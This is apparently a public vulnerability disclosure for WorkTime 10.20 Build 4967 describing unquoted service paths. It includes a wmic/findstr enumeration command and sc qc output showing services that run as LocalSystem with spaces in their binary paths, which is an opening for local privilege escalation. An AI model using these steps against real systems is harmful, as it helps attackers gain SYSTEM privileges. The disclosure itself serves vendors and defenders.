Worktime 10.20 Build 4967 Unquoted Service Path

`# Exploit Title: WorkTime 10.20 Build Build 4967 Unquoted Service Path  
# Discovery by: Yehia Elghaly  
# Date: 30-12-2021  
# Vendor Homepage: https://www.worktime.com/  
# Software Link: https://www.worktime.com/download/worktime_corporate.exe  
# Tested Version: 10.20 Build Build 4967  
# Vulnerability Type: Unquoted Service Path  
# Tested on: Windows 7 x86 - Windows Server 2016 x64  
  
# Step to discover Unquoted Service Path:  
  
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"  
|findstr /i /v "c:\windows\\" |findstr /i /v """  
  
WorkTime Server srvWorkTimeServer   
C:\WorkTime\WorkTimeServerService.exe  
Auto  
  
WorkTime Reports Scheduler WorkTimeReportsScheduler   
C:\Program Files\WorkTimeAdministrator\WorkTimeReportsScheduler.exe   
Auto  
  
WorkTime Client Watcher Service WTCWatch   
C:\Program Files\wtc\WTCWatch.exe WTCWatch  
Auto  
  
  
C:\Users\psycho>sc qc WorkTimeReportsScheduler  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: WorkTimeReportsScheduler  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 0 IGNORE  
BINARY_PATH_NAME : C:\Program Files\WorkTimeAdministrator\WorkTimeRepo  
rtsScheduler.exe  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : WorkTime Reports Scheduler  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem  
  
C:\Users\psycho>sc qc WTCWatch  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: WTCWatch  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 0 IGNORE  
BINARY_PATH_NAME : C:\Program Files\wtc\WTCWatch.exe WTCWatch  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : WorkTime Client Watcher Service  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem  
`